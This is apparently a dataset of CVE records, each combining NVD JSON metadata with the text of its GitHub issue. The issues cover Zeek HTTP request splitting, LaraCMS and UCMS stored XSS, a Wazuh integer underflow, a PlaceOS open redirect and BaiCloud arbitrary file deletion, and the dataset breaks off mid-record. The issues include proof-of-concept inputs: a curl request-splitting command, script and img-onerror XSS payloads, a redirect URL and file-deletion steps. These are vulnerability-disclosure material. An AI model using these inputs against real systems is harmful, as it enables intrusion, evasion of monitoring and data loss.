By sending a specific HTTP POST request, ZEEK will split a request into multiple and split the wrong fields. This will invalidate any ZEEK HTTP based security analysis(Including ZEEK's internal security plug-ins). POC ``` curl -A '' -H "Content-Length: 1" -X POST -d 'ePOST /a.html HTTP/1.0 Content-Length: 1 abc abc abc' http://192.168.220.132/a.html ``` Detailed information ZEEK version ``` [root@localhost etc]# zeek -v zeek version 4.1.0 ``` Start ZEEK ``` [root@localhost etc]# zeekctl deploy checking configurations ... installing ... removing old policies in /opt/zeek/spool/installed-scripts-do-not-touch/site ... removing old policies in /opt/zeek/spool/installed-scripts-do-not-touch/auto ... creating policy directories ... installing site policies ... generating standalone-layout.zeek ... generating local-networks.zeek ... generating zeekctl-config.zeek ... generating zeekctl-config.sh ... stopping ... stopping zeek ... starting ... starting zeek ... ``` Send normal request ``` $ curl -A '' -H "Content-Length: 1" -X POST -d 'abcdefg' "http://192.168.220.132/b.html" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 153 100 146 100 7 93890 4501 --:--:-- --:--:-- --:--:-- 149k<html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx</center> </body> </html> ``` ZEEK generates 1 log The request method is POST, the host is 192.168.220.132, and the uri is / b.html ``` #separator \x09 #set_separator , #empty_field (empty) #unset_field - #path http #open 2021-09-24-05-00-24 #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types #types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string] 1632484819.459273 C24wiZ28yo32mwBMu3 192.168.220.1 64691 192.168.220.132 80 1 POST 192.168.220.132 /b.html - - - - 1 0 - - - - (empty) - - - Fbvx9w4gFY2M8p5l5b - - - - - ``` Send poc ``` $ curl -A '' -H "Content-Length: 1" -X POST -d 'ePOST /a.html HTTP/1.0 > Content-Length: 1 > abc' "http://192.168.220.132/a.html" > abc abc > abc' "http://192.168.220.132/a.html" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 200 100 146 100 54 67655 25023 --:--:-- --:--:-- --:--:-- 195k<html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx</center> </body> </html> ``` ZEEK generates HTTP logs with 3 errors The first display request method is POST, host is - uri is / a.html The second display request method is bc, host is - uri is abc The third display request method is POST, the host is 192.168.220.132, and the uri is / a.html Obviously, ZEEK divides an HTTP request into three, and the request method, request host and request URI are misplaced. This will invalidate any ZEEK HTTP based analysis. HTTP request splitting vulnerability exists. ``` #separator \x09 #set_separator , #empty_field (empty) #unset_field - #path http #open 2021-09-24-05-00-24 #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types #types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string] 1632484819.459273 C24wiZ28yo32mwBMu3 192.168.220.1 64691 192.168.220.132 80 1 POST 192.168.220.132 /b.html - - - - 1 0 - - - - (empty) - - - Fbvx9w4gFY2M8p5l5b - - - - - 1632484946.877654 CmKAkh1zenUA59sVsj 192.168.220.1 64698 192.168.220.132 80 2 POST - /a.html - - - - 1 0 - - - - (empty) - - - FUmgdL1Zmy0pyu5aM6 - - - - - 1632484946.877654 CmKAkh1zenUA59sVsj 192.168.220.1 64698 192.168.220.132 80 3 bc - abc - - - - 0 0 - - - - (empty) - - - - - - - - - 1632484946.877654 CmKAkh1zenUA59sVsj 192.168.220.1 64698 192.168.220.132 80 1 POST 192.168.220.132 /a.html - - - - 1 0 - - - - (empty) - - - F0j8nJ1AX0MLkUx1Y7 - - - - - ```
There is a http request splitting vulnerability
https://api.github.com/repos/zeek/zeek/issues/1798/comments
29
2021-09-24T12:58:26Z
2021-10-01T07:50:20Z
https://github.com/zeek/zeek/issues/1798
1,006,439,707
1,798
2,626
CVE-2020-20128
2021-09-29T22:15:07.223
LaraCMS v1.0.1 transmits sensitive information in cleartext which can be intercepted by attackers.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laracms_project:laracms:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "9659BF16-DC5D-4966-A263-A2F45F9C2808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "319" ]
319
https://github.com/wanglelecc/laracms/issues/33
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wanglelecc", "laracms" ]
![图片](https://user-images.githubusercontent.com/33534676/63633834-0cd6df00-c681-11e9-8f43-19e31b628f8f.png) ![图片](https://user-images.githubusercontent.com/33534676/63633846-44458b80-c681-11e9-9a16-d10de7875c54.png) ![图片](https://user-images.githubusercontent.com/33534676/63633851-67703b00-c681-11e9-9fcc-8fb6fb8803ac.png) ![图片](https://user-images.githubusercontent.com/33534676/63633882-d5b4fd80-c681-11e9-996b-950e76cb173c.png) The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. So please encrypt the data with a reliable encryption scheme before transmitting.
Security-Cleartext Transmission of Sensitive Information
https://api.github.com/repos/wanglelecc/laracms/issues/33/comments
0
2019-08-24T07:18:23Z
2019-08-24T07:18:23Z
https://github.com/wanglelecc/laracms/issues/33
484,788,553
33
2,627
CVE-2020-20129
2021-09-29T22:15:07.270
LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content editor.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laracms_project:laracms:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "9659BF16-DC5D-4966-A263-A2F45F9C2808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wanglelecc/laracms/issues/34
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wanglelecc", "laracms" ]
![图片](https://user-images.githubusercontent.com/33534676/63648382-9362ed80-c761-11e9-8a30-fab441c72a5e.png) 如图进入内容管理页面,查看内容列表,随意挑选一个内容进行编辑(测试中编辑“招聘结算主管”这一条) 在内容编辑处,输入任意脚本内容(测试输入alert("test")),同时选择输入内容点击插入链接,,并在链接处输入script,如上图。 ![图片](https://user-images.githubusercontent.com/33534676/63648415-27cd5000-c762-11e9-8ae8-ae31349f5aa0.png) 然后完成编辑,点击提交按钮 ![图片](https://user-images.githubusercontent.com/33534676/63648425-416e9780-c762-11e9-8661-05b59fe0a9e8.png) ![图片](https://user-images.githubusercontent.com/33534676/63648437-5a774880-c762-11e9-85cd-042adb72c86d.png) 使用相关工具,拦截提交的请求,并将提交的<a herf="script" target=_blank>alert("test")</a>的URL编码替换为<script>alert("test")</script>的URL编码 ![图片](https://user-images.githubusercontent.com/33534676/63648489-05880200-c763-11e9-9839-c2939a8b9f72.png) ![图片](https://user-images.githubusercontent.com/33534676/63648490-091b8900-c763-11e9-83b0-9b248275bde1.png) 提交请求到服务器,此时对应脚本已写入数据库中。 ![图片](https://user-images.githubusercontent.com/33534676/63648505-441dbc80-c763-11e9-8b89-bf1f4fddf5a8.png) ![图片](https://user-images.githubusercontent.com/33534676/63648507-47b14380-c763-11e9-9528-46f2d4f65b0a.png) 任意用户访问该页面,都会执行插入的脚本,测试中则是弹出“test”提示框。 修复建议:对插入的超链接请求在服务器端也做编码和过滤。
存储型XSS漏洞1
https://api.github.com/repos/wanglelecc/laracms/issues/34/comments
1
2019-08-25T10:08:54Z
2019-08-25T12:31:24Z
https://github.com/wanglelecc/laracms/issues/34
484,913,530
34
2,628
CVE-2020-20131
2021-09-29T22:15:07.310
LaraCMS v1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows atackers to execute arbitrary web scripts or HTML via a crafted payload in the page management module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wanglelecc/laracms/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:laracms_project:laracms:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "9659BF16-DC5D-4966-A263-A2F45F9C2808", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wanglelecc/laracms/issues/36
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wanglelecc", "laracms" ]
![图片](https://user-images.githubusercontent.com/33534676/63797670-1db27980-c93b-11e9-81ad-60247b4d8dc5.png) ![图片](https://user-images.githubusercontent.com/33534676/63797672-1ee3a680-c93b-11e9-9848-76bc0e4d351e.png) ![图片](https://user-images.githubusercontent.com/33534676/63797683-230fc400-c93b-11e9-904e-b872e7f5af9c.png) ![图片](https://user-images.githubusercontent.com/33534676/63797692-26a34b00-c93b-11e9-92ff-8fe047096bda.png) ![图片](https://user-images.githubusercontent.com/33534676/63797700-2acf6880-c93b-11e9-99a3-caf29afd7bea.png) The vunerbility is founded in laracms v1.0.1. Hackers can inject a script in the place where the page is managed. It's content accept all user input and store to the database. While other user accessing this website will excute the script. You should filter and escape the output which is picked up from database before show it to the users.
Stored XSS of PAGE control
https://api.github.com/repos/wanglelecc/laracms/issues/36/comments
0
2019-08-27T18:37:59Z
2019-08-27T18:37:59Z
https://github.com/wanglelecc/laracms/issues/36
485,969,046
36
2,629
CVE-2020-20781
2021-09-29T23:15:07.273
A stored cross-site scripting (XSS) vulnerability in /ucms/index.php?do=list_edit of UCMS 1.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the title, key words, description or content text fields.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/forget-code/ucms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/forget-code/ucms/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ucms_project:ucms:1.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "5498798F-9AC7-4309-B2E9-90B8959E70F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/forget-code/ucms/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "forget-code", "ucms" ]
The title and key words of the article can be described by using payload: 123 "> < img SRC = www.baidu. Com onerror = alert (1) >;Content use payload: < img SRC = www.baidu.com ; onerror = alert (1) >
The title, key words, description and content of the article are all stored XSS.
https://api.github.com/repos/forget-code/ucms/issues/1/comments
2
2019-10-21T02:27:11Z
2019-10-21T02:33:27Z
https://github.com/forget-code/ucms/issues/1
509,696,624
1
2,630
CVE-2021-41821
2021-09-29T23:15:07.350
Wazuh Manager in Wazuh through 4.1.5 is affected by a remote Integer Underflow vulnerability that might lead to denial of service. A crafted message must be sent from an authenticated agent to the manager.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://documentation.wazuh.com/current/release-notes/release_4_2_0.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/9201" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://documentation.wazuh.com/current/release-notes/release_4_2_0.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wazuh/wazuh/issues/9201" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "matchCriteriaId": "7C421B49-CE07-4378-BFEB-AF205ECE14FA", "versionEndExcluding": null, "versionEndIncluding": "4.1.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "191" ]
191
https://github.com/wazuh/wazuh/issues/9201
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wazuh", "wazuh" ]
|Wazuh version|Component|Install type|Install method|Platform| |---|---|---|---|---| | Latest | Remoted| Manager/Agent | Packages/Sources | OS version | Hello team, After checking the remote code, we observed something that should be reviewed because it could incur an integer underflow. Specifically here: https://github.com/wazuh/wazuh/blob/master/src/remoted/secure.c#L77 After defining the size, and depending on the input value, the following can have a lower value: https://github.com/wazuh/wazuh/blob/master/src/remoted/secure.c#L477 For instance, with a buffer of `!1234!` **_Reported by Johannes Segitz of SUSE_** Regards, Miguel Casares
Potential integer underflow in remote code
https://api.github.com/repos/wazuh/wazuh/issues/9201/comments
1
2021-07-05T16:36:54Z
2021-07-23T16:35:50Z
https://github.com/wazuh/wazuh/issues/9201
937,240,496
9,201
2,631
CVE-2021-41826
2021-09-30T00:15:07.543
PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/PlaceOS/auth/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/PlaceOS/auth/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F6D8278-E4CC-494D-93A2-11B47DFA100C", "versionEndExcluding": "1.29.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/PlaceOS/auth/issues/36
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "PlaceOS", "auth" ]
The application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. ` # Log off def destroy remove_session # do we want to redirect externally? path = params.permit(:continue)[:continue] || '/' if path.include?("://") authority = current_authority uri = Addressable::URI.parse(path) if uri.domain == authority.domain path = "#{uri.request_uri}#{uri.fragment ? "##{uri.fragment}" : nil}" else path = authority.logout_url if path.include?("continue=") path = URI.decode_www_form_component(path.split("continue=", 2)[-1]) end end end redirect_to path end ` ![oredirect](https://user-images.githubusercontent.com/91553733/135121169-6256b5b9-20a2-483d-93a4-50f6a24e1aee.png) Payload: https://<domain>/auth/logout?continue=//<external_domain>
CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
https://api.github.com/repos/PlaceOS/auth/issues/36/comments
1
2021-09-28T15:52:23Z
2021-09-29T23:28:23Z
https://github.com/PlaceOS/auth/issues/36
1,009,926,197
36
2,632
CVE-2021-41729
2021-09-30T11:15:08.087
BaiCloud-cms v2.5.7 is affected by an arbitrary file deletion vulnerability, which allows an attacker to delete arbitrary files on the server through /user/ppsave.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/meiko-S/BaiCloud-cms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/meiko-S/BaiCloud-cms/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:baicloud-cms_project:baicloud-cms:2.5.7:*:*:*:*:*:*:*", "matchCriteriaId": "0549B593-C9B9-4D6D-A5B3-B640809DF916", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/meiko-S/BaiCloud-cms/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "meiko-S", "BaiCloud-cms" ]
Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery: 30 August 2021 Product version: 2.5.7 Download link Author: hibiki-sama Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept 1 Vulnerable URL: /user/ppsave.php Vulnerable Code: line 68 - kanacms\user ![11](https://user-images.githubusercontent.com/90680368/134283981-f124397f-4532-4900-87f1-e27f83059a67.png) It can be found that there is no verification, just judge whether it is the same as the previous or default, and then use unlink to delete the file as long as the file exists Therefore, the vulnerability analysis and utilization are very simple ![22](https://user-images.githubusercontent.com/90680368/134283993-733f6e44-32e3-4700-8e7f-57351b0b09bb.png) We deleted the installed lock file / install / install.lock ![33](https://user-images.githubusercontent.com/90680368/134284001-b5bbc7dd-b0f8-4c6f-9e2b-8f0bd64e1ae7.png) Proof of Concept 2 Vulnerable URL: /user/adv.php Vulnerable Code: line 77 - kanacms\user/adv.php There is an arbitrary file deletion vulnerability. I have to say that the system is really problematic in judging this The file causing the problem is in / user / adv.php It is also a problem caused by the comparison between oldimg and img ![44](https://user-images.githubusercontent.com/90680368/134284013-1e56fe5c-8e5c-4850-b7e0-aff29c6164f1.png) Similar to the above analysis, it only judges whether it is the same as the original, and then splices.. / and directly calls unlink, so the use is also very simple Just delete the hidden of the form attribute in HTML, and then directly enter the file name you want to delete
Bug Report: Multiple Arbitrary File Deletion vulnerabilities
https://api.github.com/repos/meiko-S/BaiCloud/issues/3/comments
1
2021-09-22T04:36:17Z
2021-09-23T02:50:22Z
https://github.com/meiko-S/BaiCloud/issues/3
1,003,779,063
3
2,633
CVE-2020-20662
2021-09-30T17:15:07.473
libiec_iccp_mod v1.5 contains a heap-buffer-overflow in the component mms_client_example1.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fcovatti/libiec_iccp_mod/issues/6" } ]
